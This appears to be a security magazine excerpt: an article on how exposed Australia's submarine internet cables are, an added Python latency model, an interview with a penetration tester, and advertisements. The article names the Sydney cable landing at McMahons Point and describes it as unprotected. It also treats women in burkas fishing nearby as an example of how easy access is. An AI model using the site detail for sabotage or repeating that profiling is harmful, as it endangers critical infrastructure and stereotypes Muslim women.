Normal connectivity between Australia and the UK has a latency per packet of 300ms, and around 250ms to the US; with the time taken consisting of a combination of the near speed of light photons traversing the fibre optic cables under the ocean and the requirement to regenerate the signal every hundred or so km. These limitations on the cables are due to the laws of physics rather than implementation, and to use the words of a famous fictional engineer: "I canna change the laws of physics". With satellites these limitations are even worse, with the time taken to travel the approximately 36,000km up to a geostationary satellite and back of 250ms, and then with the additional distance between satellites at this distance each packet may take a second or more to traverse between continents. For low earth orbit satellites the latency is less, but these move relative to the ground so internet connectivity is less predictable. For SSL there are several protocol related packets that must be exchanged synchronously before the data itself is sent (Hello Server, Hello Client, what security do you support server, what security can you use client, etc), so with potentially several seconds needed over a satellite just to set up an exchange, timeouts are likely to occur, affecting the likelihood of successful application use and telephony via satellite. So, if the backup for the submarine cabling is satellite it is likely many business applications would back up and fail. In-country applications, however, would not be affected.

Consider what happened in 2008 and 2011 when multiple submarine cables were cut by ships dragging anchors, and the attempted cut of multiple cables in Egypt in 2012. The Internet slowed down in regions and connectivity was almost completely lost. So, if a slowdown can cause disruption of a system, consider what would happen if the cables into Australia were cut; particularly as they mostly go into one place. Would the backup connectivity cope? Most likely global systems, such as critical finance systems, and telephony would be disrupted with major impact to the national economy and the systems of large corporations.

What Infrastructure is in Place?
Australia currently uses 3.4 Tbps of bandwidth on its cables connecting to the rest of the world through the five cables coming into Sydney: the Southern Cross Cable Network, Australia-Japan Cable, Telstra's Endeavour, Pipe Networks PPC-1, and SeaMeWe-3; all of which are not at capacity, but all of which connect into the east coast of Australia in Sydney. A single, lower capacity, older cable connects into Western Australia and on up to Singapore. Whilst capacity can be upgraded on these existing five links in Sydney via upgrades to the equipment at the endpoints, what can't be fixed with upgrades to these cables is resilience, due to them all coming into the same unsecured area (Figure 1).

Figure 1. Submarine Cable Connections into Australia

Considering the statement from the Australian Communications and Media Authority (ACMA) of the submarine cable links being a "vital part of our national infrastructure", and the maintenance of two maritime protection zones around the connections into Sydney and the additional zone around Perth, the impression would be that these cables were heavily guarded, with consideration for protection and resilience at all points. This is not the case.

Whilst working in Sydney and looking into overall resilience for the Australian components of a global system, the author visited one of the cable terminuses at McMahons Point in Sydney. The protection consisted of a bright yellow sign warning that the cable was present – nothing more. See the picture below. So, it appears that the hope is that polite terrorists will take note of the word "Caution". Ironically, the author did get a picture that he has not included because it would appear to be racially motivated, but on one occasion he found two women in full burkas, thus hiding their identity, fishing in front of the sign – showing how easy unfettered access is. The McMahons Point ferry terminal is beside the tree on the right corner of the picture, showing how well thought out the maritime protection policy is (Figure 2).

Figure 2. McMahons Point Submarine Cable Terminus – Sydney

Risk of Failure and Terrorism
The point of this paper is to highlight two types of risk. Whilst there is capacity to spare on the current connectivity into Australia, the connections into a common unprotected area (Paddington in New South Wales, for example) do represent a risk of acts of God, dragged anchors, or terrorism. The slow down due to reduced capacity if the east coast connections were lost would force all traffic to exit the country via Perth, and the in-country connections and the external connection are unlikely to be able to cope. This would lead to use of the satellite links, and higher up the software stack there would be failures; eventually leading to timeouts, a backing up of traffic in financial transactions, and a major financial impact or ruin for companies or even the country, depending on how long the problem existed.

This isn't just a problem for the nation as a whole, but is something that must be considered in application and infrastructure design for global systems. Latency must be considered when siting web channels for distributed systems; particularly where frameworks that use the code-behind architecture (for example, JSP, ASP.NET, etc) to minimise client and browser dependencies and use server side processing are in use. Thus, a web front end should be sited in region to avoid latency issues when tabbing between fields. However, when that calls to middle or back end tiers, a latency hit of several seconds could lead to the application being unusable from a user perspective or even just failing completely due to timeouts; so satellite backup for submarine cables, with unpredictable behaviour or long latency, is not a real option except to supplement the existing cable network.

What will happen when the national broadband network is rolled out? Well, much of the existing web traffic and telephony usage is in country; but so much of the foreign connectivity is key (foreign payments, travel, international finance exchange, web searches, etc) that the impact of its loss would be a major problem. So, when doing penetration testing – which is all about making sure confidentiality and integrity are covered from a security point of view, but where availability must also be considered – thought must be given to the impact of latency under normal conditions, abnormal high traffic conditions due to connectivity issues, and complete failure of the connections. These can cause failure of the application or invocation of the disaster recovery procedures.

One of the techniques that is not often used, but which is very effective, is failure mode event analysis (FMEA) – a tool borrowed from the aircraft industry. In this, events are talked through to work out what would happen when a failure occurs, using the whole stack end to end. In this, it has often been found that the combination of high availability solutions can result in such an increase in complexity and unpredictable behaviour that availability is reduced. When doing FMEA on a global system the increased latency or failure of international connectivity must be considered, and the way the system will behave on failure and recovery understood and catered for. The impact on the system and the owning company may be significant. However, what about the wider impact? Australia is a successful country, as well as being a beautiful and friendly one, but without communications to the outside world the financial and social impact would be enormous. Having five connections into the same area of the nation, with only one older alternative on the other side of the country, is an enormous risk. When the national broadband network initiative delivers, the increased bandwidth requirements will make recovery even harder, so increasing the risk.
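The latency argument above (synchronous SSL set-up exchanges, satellite versus cable, calls to middle or back-end tiers, FMEA) as a small worked model, added here and not from the article: it counts the synchronous round trips one user action needs over each path and checks the total against a client timeout. All link figures, the four-call workload and the 2-second timeout are assumptions taken or extrapolated from the text; `Link`, `request_time_ms`, `fmea_row` and `failover_analysis` are mine.

```python
"""Latency budget model for the FMEA discussion: synchronous round trips per
user action on each connectivity path, compared with a client timeout.
Added example, not from the article; every figure is an assumption."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Link:
    name: str
    rtt_ms: float   # assumed round-trip time for one request/response exchange


# The article quotes ~300 ms per packet Australia-UK, ~250 ms Australia-US,
# ~250 ms to reach a geostationary satellite and back, and "a second or more"
# once several satellite hops are chained. Treated here as round-trip figures.
CABLE_AU_UK = Link("submarine cable, AU-UK", 300)
CABLE_AU_US = Link("submarine cable, AU-US", 250)
SAT_SINGLE_HOP = Link("single geostationary hop", 500)   # assumed: 250 ms each way
SAT_MULTI_HOP = Link("chained satellite hops", 1500)     # assumed: "a second or more"

TCP_HANDSHAKE_RTTS = 1   # SYN / SYN-ACK before the first byte can be sent
TLS_HANDSHAKE_RTTS = 2   # full TLS 1.2 handshake: hellos, key exchange, Finished


def setup_time_ms(link, tls=True):
    """Time until the first application byte can be sent over `link`."""
    rtts = TCP_HANDSHAKE_RTTS + (TLS_HANDSHAKE_RTTS if tls else 0)
    return rtts * link.rtt_ms


def request_time_ms(link, tier_calls, tls=True):
    """One user action that opens a connection and then makes `tier_calls`
    sequential, synchronous calls across the link to middle/back-end tiers."""
    return setup_time_ms(link, tls) + tier_calls * link.rtt_ms


def fmea_row(link, tier_calls, timeout_ms, tls=True):
    """One FMEA line for one path: total time, and whether the client
    timeout is exceeded (the failure the article predicts for satellite)."""
    total = request_time_ms(link, tier_calls, tls)
    return {
        "link": link.name,
        "total_ms": total,
        "timeout_ms": timeout_ms,
        "fails": total > timeout_ms,
        "headroom_ms": timeout_ms - total,
    }


def failover_analysis(paths, tier_calls, timeout_ms):
    """Walk the failure scenario: the same user action over each path that
    traffic might take once the primary cables are lost."""
    return [fmea_row(p, tier_calls, timeout_ms) for p in paths]


if __name__ == "__main__":
    # Assumed workload: a page action that fans out into four synchronous
    # tier calls, against a 2-second client timeout.
    paths = [CABLE_AU_US, CABLE_AU_UK, SAT_SINGLE_HOP, SAT_MULTI_HOP]
    for row in failover_analysis(paths, 4, 2000):
        state = "FAIL" if row["fails"] else "ok"
        print(f'{row["link"]:26s} {row["total_ms"]:7.0f} ms  {state:4s} '
              f'headroom {row["headroom_ms"]:+.0f} ms')
```

Even the UK cable path misses the 2-second budget once four tier calls cross the ocean, which is the article's case for siting the front end in region; the satellite paths fail before the first byte of data is sent.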
What Should be Done?
The first step to protecting the nation, and the applications that run in it, is to protect the existing cables coming into the country. A sign informing potential terrorists and nothing else is not exactly adequate protection. In Egypt activist scuba divers tried to cut and destroy the cables. So, a genuine protective area from maritime attack is needed – although this would be difficult in an area as busy as Sydney harbour! However, at the very least the connection transition onto land should be secured, with barbed wire and monitoring; and a large sign probably wouldn't be advisable. Having the majority of the connections so important to the country coming into the same place is also ill advised. Additional connections into Australia, coming into a different location than Sydney on the east coast, along with additional connections on the west coast, are desperately required – along with the acceptance that satellite connectivity is not a real answer due to the latency, which will cause timeouts and failures higher up the software stack.

Conclusion
Security assessments aren't only about confidentiality and integrity, but about availability as well – forming the CIA triad – and in a global system that must include an understanding of the oceanic links into a country. With Australia there are five connections into one area on one side of the country and one into the other side, and these connections are not well protected – which leads to a considerable risk from both accidental damage and terrorism. This would not just cripple a global distributed system, but the country as a whole. The increased latency of satellite links means that these are not a suitable backup solution, so new connections elsewhere into the country are needed.

COLIN RENOUF
Colin Renouf is a long standing enterprise solutions architect with thirty years' experience in the industry – concentrating on the finance sector. He has authored many magazine articles ranging from Unix, through Java and on to security; and has also written and contributed to books on the subject. He is currently contracting for a well known credit card company, but his main loves are Australia and some of its people, singing, photography and just being with good company. Oh, and quantum physics, as he is an eternal scientist.
INTERVIEW
Interview with Rod Soto Rod Soto is a security researcher and board member of HackMiami. He is a regular speaker at hacking conferences all over the country on the topics of penetration testing tools and methods, as well as the topic of digital civil liberties. Rod Soto was the winner of the 2012 Black Hat Las Vegas Capture the Flag hacking competition, and is the founder and lead developer of the Kommand&&Kontrol competitive hacking tournament series. He is currently a senior security engineer with the emergency response team of an information security corporation engaged in digital crime intelligence analysis, vulnerability assessments, penetration testing, and malware reversal.
You won the Black Hat hacking competition last year. How were you preparing for this competition? Is there any way to prepare? What advice would you give to those who would like to try themselves in such a competition?
It was not easy and it took a lot of effort. I advise those who want to get better at playing CTFs to play as many as they can, save and follow write-ups of those challenges you couldn't get, and study and research as much as you can. Create your own lab and create challenges.

How do you improve your skills? Do you have any methods that have proven to be more effective than others? Could you share some with our readers?
Improving your skills depends on your dedication and willingness to learn new things. You need to be up to date and willing to learn new technologies and techniques that may not be easy at first and that require studying hard.

Why did you choose the Information Security field for your profession instead of other Information Technology domains?
My background is mainly in system architecture, integration and administration. Throughout the years I became more focused on Information Security as it became more significant in the organizations I was working for, plus I always thought of information security as a very challenging and changing industry.

What do you consider so challenging in the field of Information Security? It seems that you have a thing for competitions, is this it or something else as well? :)
I do... :) It is a way of challenging myself to learn new things and to face and adapt to unknown scenarios.

What were the biggest challenges that you have ever experienced in the past, especially when you worked as a Junior Information Security professional?
Mostly access to the right information. I started becoming more knowledgeable as I started networking with colleagues, going to conferences and visiting hackerspaces. In many aspects of infosec you pretty much have to become an autodidact. You have to put in time, discipline and persistence to learn completely new things, and in many cases with a high level of difficulty.

Do you have any suggestions for our readers? Especially for those who would like to become pentesters?
There are many books you can read or courses you can take, but in reality you need a base knowledge and understanding in networking, operating systems, programming/scripting languages, application vulnerabilities and finally exploit creation, even if you will never create one yourself.

Are there any specific personality traits that one should have in order to achieve success? What personality features are valued in this job?
Like many jobs, I believe patience, persistence, tolerance to frustration, a strong work ethic and ability to adapt to change are fundamental personality traits needed to be successful.

What are the top 5 challenges for the junior IT professional who would like to learn and master skills in Information Security?
• Orientation on career direction
• Efficient learning habits
• Mentorship
• Financial aid
• Time

Sounds like a good plan, but how to find a mentor? How did you find yours?
I am mostly self taught. I did take some courses and read lots of books, but as far as a mentor – I have never had one nor do I have one now. I did find lots of help by attending a local hackerspace, HackMiami, and I met some great people at DEFCON. Basically going into the community helped me a lot when I was trying to learn new things. Finding a mentor is not easy, but there are certainly people in the community that are willing to help newcomers. We do that at HackMiami.

Could you give a few examples of learning habits that appeared to be efficient in your case? Maybe this will inspire our readers to look for their own...
I read at least one relevant book per month, I recreate as many vulnerabilities as I can as they are published in my own lab. If I find I need to learn further about a certain application or technology I then research white papers, books and authors.

On the basis of your experience and expertise, what is the best methodology for learning and mastering Information Security?
Patience, persistence, discipline and the ability to tolerate frustration. This is not a field for the faint of heart.

How is the career path for being an Information Security professional in terms of salary and position? Is the Information Security professional career path more promising and better than other IT professions?
Right now it is. The Information Security job market is dominated by employees. There are simply not enough people and there probably won't be for the near future. Financially speaking, it is definitely one of the best places to be in the IT industry. As a career it has also become a very relevant and challenging field, but as with any industry one should not rely on it for unsubstantiated longevity.

What are the best pentesting tools in your opinion? Could you recommend some to our readers?
I am a Metasploit kind of guy, but I always try to replicate vulnerabilities and exploits without using it. I think Burp and Acunetix are great web scanners and of course there are plenty of open source tools. I look at pentesting as mix and match. I always have to be prepared to think outside the box and try new tools, some of them I have to learn on the run.

What are your favorite methods for penetration tests? The ones you consider the most effective? Do you have a set with which you start each task?
Know your target very well and your tools and the rest will follow. Take your time to footprint, analyze and understand the environment you are probing. There are no "one clicks".

Malware, trojans as well as the latest cyber attacks are often ahead of and unpredictable compared with most of the information security technology and tools. What suggestions do you have to prevent and minimize these kinds of attacks?
I do believe that offense must drive defense. Understanding, analyzing, reversing and using malicious tools in your own lab environment will provide you the ability to visualize the malicious attacker's mindset and preferred attack vectors. You can never be 100% secure, but you can minimize and mitigate potential threats by keeping yourself up to date on tools, vulnerabilities and doing your own research, not only technical but also using open source intelligence tools.

What does HackMiami do? Is it an Information Security platform/group for Information Security minded people?
HackMiami is a hackerspace based in Miami, FL. It is composed of mostly information security professionals and we focus on information security research and education. We also have a maker wing that focuses on open source robotics and general maker projects.

This maker wing sounds great. Could you tell us more about it? What projects are you working on now?
Current projects are: an unmanned submarine, micro drones, fighting robots. Here is a video of the quadcopter built by one of our members: http://www.youtube.com/watch?v=qn9Eq1mJ6Ks.

Could you describe one of the completed and successful projects of this open source section?
See the quadcopter video.

There are some areas that don't have such a nice initiative like HackMiami yet. Is it hard to establish a hackerspace? What things are required?
It is not easy. There are many challenges, starting from financial support, potential liability and dealing with many different personalities. At the end of the day it depends on people's willingness to participate and support the hackerspace. You can always find a place to meet, but if people are not showing up or participating then you won't get very far.

Could you recommend some good links or reads about creating your own lab environment?
There are 3 books that will get you started in my opinion. One of them is Metasploit the Pentester Guide. Second is Professional Penetration Testing, and third I would recommend the Web Application Hacker's Handbook.

How should one proceed with their own research? Could you give some tips for those who haven't done it yet?
Set up your lab. It does not cost much, but it is important to have your own environment where you can experiment and break things without getting in trouble. You can use some of the open source hypervisors and operating systems publicly available on the internet.

What are the best open source intelligence tools in your opinion? I think our readers will be interested in this very much.
In my opinion those tools have yet to be developed. I have experimented with some commercial and open source tools and I do not think they are at the right place yet. There is a lot of work to be done in this area.

If there were cyber attacks targeted at a specific destination in a specific country, would it be possible to trace back the attacker(s) accurately?
Attribution is always very challenging and very difficult to prove. There are many methods and tools, though, that may give you a certain level of confidence that an attack came from a specific source. Again, there will be a level of uncertainty. As to how an organization or country deals with that level of uncertainty, that would depend on their own policies and rules of engagement.

What are the most dangerous, unpredictable and untraceable cyber attacks that happened in the past few years, based on your experience? Which industry was the main target of this kind of attack?
I have seen attacks directed at certain industries such as financial, infrastructure and major corporations. I definitely believe that SCADA infrastructure attacks are the most potentially dangerous attacks and the ones that may likely cause human casualties. I am not aware such an event has happened yet, although governments and military contractors are training for these types of attack scenarios, both offensive and defensive. If a large scale SCADA attack takes place that results in loss of life, the most likely culprit would be a state sponsored attack.

How did it happen that you became a founder and developer of a competitive hacking tournament series?
I wanted an excuse to hang out with my friends and party doing what we love the most :). I thought it was cool to travel and do it in different places with different people and make it fun and challenging.

What was your objective in forming the Kommand && KonTroll competitive hacking tournament series?
Kommand && KonTroll is a computer security competition in a private environment where players are faced with different challenges. Most of those challenges are web based or infrastructure. We also have some binary reversal challenges, but that is not our focus. We try to make it as close to the "trenches" as we can, as we try to give players a view of the underground. We use publicly available software and vulnerabilities, or we modify targets to be vulnerable. The game also implies defense, as players are allowed to attack other players. This game allows players to learn, experiment and practice with many information security tools and wares that they would otherwise not be able to use or work with at their current organizations.

How do you prepare the tasks for such a tournament? Does it take long? Where are you searching for inspiration?
Yes, it takes long... between 100 to 150 hours. I do heavy research on scenarios, cultures, characters, personalities, music, videos, history and real life scenarios. Every challenge tells a story; in some instances challenges could branch into a whole new CTF. I try to make it relevant and I try to make it fun. I distribute challenge difficulty levels in a way that allows players with different skills to be able to play and win the CTF.

You are involved in digital crime intelligence analysis, can you tell us more about it?
I can't without breaking my NDA. Sorry.

Cloud Computing and Virtualization technologies are getting more popular day by day. Do you think both technologies might be a new target for cyber attacks? Have you ever discovered the latest attack techniques done by attackers in a Cloud Computing environment?
I do believe those technologies definitely introduce new risks and vectors of attack. I do not believe that those technologies change attack methodologies; I believe they simply add more attack surface and possible single points of failure for many organizations. Organizations must be careful of putting all their eggs in the "cloud"; I myself have been involved in situations where cloud outages presented a level of availability that organizations were simply not willing to tolerate.

You give talks about digital civil liberties... What are the biggest threats in this area for computer users and mostly for security specialists and pentesters?
I gave a talk at DEFCON XX Skytalks along with some of my colleagues where we warned that regulation of such tools was not farfetched, and of the need to address these tools as a right for law abiding citizens to research, study and to defend themselves. It does look, though, like we are marching towards more regulation and possibly strict limitation and even prohibition like in some countries.

As far as digital civil liberties are concerned, what is your opinion about "hacktivism"? Is it a good way to prove the politicians wrong?
I am all for the right of people to dissent and protest as long as they do not break the law.

Do you have any plan to set up your own Information Security company in the future?
I have my own IT company called EITS and I also do work with Information Security Services, Inc out of Miami, FL.

Can you tell us a few words about EITS? How did it start and what kind of solutions/products does it offer?
My work was mostly system administration and support. It is now more towards security assessments and penetration testing.

Thank you Rod for this interview.
By PenTest Team
Cyber Security Industry Transaction Map 2004-2013

Our Role
Delling Advisory is a boutique advisory firm, providing merger and acquisition related consulting, advisory and transactional services to companies in the information security industry.

Our Advantage
We have unsurpassed industry knowledge built through a successful career in the information security market in Australia, and as a principal in transactions buying, merging, and selling companies in the information security industry.

www.dellingadvisory.com
www.dellingadvisory.com/blog (Research)

TecnoCampus Barcelona Summer School
SUMMER SCHOOL PROGRAMMES 8 - 19 JULY 2013
TWO-WEEK COURSES WITH ENGLISH TUITION AND COMPLEMENTED WITH SOCIAL, CULTURAL, SPORT AND LEISURE ACTIVITIES

SUMMER COURSE ON INFORMATION TECHNOLOGIES (IT) 1
SUMMER COURSE ON RENEWABLE ENERGIES
SUMMER COURSE ON INFORMATION TECHNOLOGIES (IT) 2
SUMMER COURSE ON BUSINESS ADMINISTRATION
SUMMER COURSE ON VIDEO AND MUSIC
SUMMER COURSE ON TOURISM
SUMMER COURSE ON CINEMA
SUMMER COURSE ON INTERNATIONAL HEALTH

OUR PROGRAMME INCLUDES:
• Tuition in English
• Attendance certificate issued by the university
• Access to our state-of-the-art facilities
• Library access
• Cultural experience
• Local sport centres and facilities
• Bus transport from and to Barcelona airport, if travelling in a group or at agreed times

This academic programme will be complemented with a cultural, social and leisure programme (optional).

Email: [email protected]
Tel.: Juan García on 00 34 93 169 65 32
tecnocampus.cat/summerschool